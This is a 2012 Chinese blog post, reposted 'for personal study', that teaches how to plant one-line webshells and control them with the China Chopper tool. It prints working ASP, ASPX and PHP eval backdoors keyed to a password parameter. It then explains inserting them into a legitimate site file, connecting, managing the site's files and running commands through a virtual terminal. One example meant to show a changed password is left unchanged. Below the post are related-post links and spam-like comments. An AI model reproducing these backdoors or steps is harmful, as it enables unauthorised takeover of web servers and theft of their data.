当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人13年前 (2012-11-15)随笔9549

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

假冒的壁虎漫步、企鹅出墙、proxy、HelloWorld等收费插件ko出品

假冒的壁虎漫步、企鹅出墙、proxy、HelloWorld等收费插件ko出品

本来正宗的壁虎漫步刚刚宣布:不可抗拒力量,壁虎漫步停止所有运营!本想着找个替代插件用用呢,没想到这边这么快就出来假冒的插件,介绍的还那么猥琐:壁虎漫步是一款速度最快的海外网站加速插件,可轻松访问google、facebook、twitter...

网页出现 javascript:void(0) ,打不开链接解决方法

网页出现 javascript:void(0) ,打不开链接解决方法

写这篇文章是非常的郁闷了,本来好好的体验着win8.1,不到一个星期呢,今天要倒腾网站的时候,发现华夏名网的控制面板不好用了,所有的弹出窗口都打不开,只是在浏览器下面显示 javascript:void(0),这是怎么情况?很后悔...

付费阅读,能有多少人愿意买单?

付费阅读,能有多少人愿意买单?

很久没有在深夜写文章了,不是工作狂,不要熬夜,身体最重要!刚好友情回访的时候看到“辽西SEO学习分享”的一篇文章“人性化的收费方式-捐赠”,不禁也想讨论一下!付费阅读,究竟有多少人愿意买单?前一阵子看到松哥博客搞了个VIP年费会员,一年18...

傻傻惹人爱歌词?萧亚轩的闪闪惹人爱,让人傻傻分不清

傻傻惹人爱歌词?萧亚轩的闪闪惹人爱,让人傻傻分不清

听到一首非常好听的歌,歌词貌似是“傻傻惹人爱,傻傻惹人爱……”,于是想搜出来听听,没想到可恶的百度知道竟然在忽悠人,有人问“傻傻惹人爱是什么歌”,采纳了回答“由贾静雯主演的台湾偶像剧《超人气校园》中的片头歌《傻傻惹人爱》”也就算了,竟然还有...

浏览电子商务网站的时候,你会关注原价么?

浏览电子商务网站的时候,你会关注原价么?

在看电子商务网站的时候,产品列表经常见到这样一些标语:原价多少多少的产品,现在活动价全场几折销售!更有甚者名牌产品全部1折起售!抢到就是赚到,限时优惠……好像什么产品天天都有折扣,天天都优惠,好像真的能赚便宜似的。可是,消费者在浏览这些电子...

《疫苗之王》原版转载:不转载,对不起祖国的花朵!

《疫苗之王》原版转载:不转载,对不起祖国的花朵!

刚开始朋友圈被这个疫苗事件刷屏的时候,看到过这篇《疫苗之王》,反映的问题很一目了然!至于是不是事实,也许只有当事人最清楚了吧!真相是什么?也许一段时间后国家有关部门真能查出点什么,要好好给广大人民一个交代!总之我个人觉得,《疫苗之王》所述之...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
13年前 (2012-12-20)

学习了

女装报告
13年前 (2012-12-11)

这是要教我们啥呀?

智能电网
13年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
13年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
13年前 (2012-11-24)

好,顶

奶茶
13年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
13年前 (2012-11-21)

学习了

霍致永博客
13年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
13年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
13年前 (2012-11-19)

不是很懂,只来看看。

男装
13年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
13年前 (2012-11-16)

来学习了,谢谢分享

润初颜
13年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。